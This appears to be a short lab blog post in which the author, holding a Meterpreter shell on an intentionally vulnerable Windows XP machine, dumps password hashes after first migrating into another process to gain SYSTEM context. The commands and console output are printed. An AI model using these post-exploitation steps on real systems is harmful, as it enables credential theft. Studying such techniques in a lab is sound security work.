This follows on from a previous post in which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:
Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
I attempted to obtain the password hashes from the exploited system:
meterpreter > run hashdump
[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22…
[*] Obtaining the user list and keys…
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_query_value: Operation failed: The handle is invalid.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
But this failed and hinted that I should migrate into a service process, which I did:
meterpreter > run post/windows/manage/migrate
[*] Running module against LAB
[*] Current server process: ALqkE.exe (3740)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3672
[+] Successfully migrated to process 3672
After this, run hashdump worked perfectly.
I have blogged on obtaining the password hashes previously.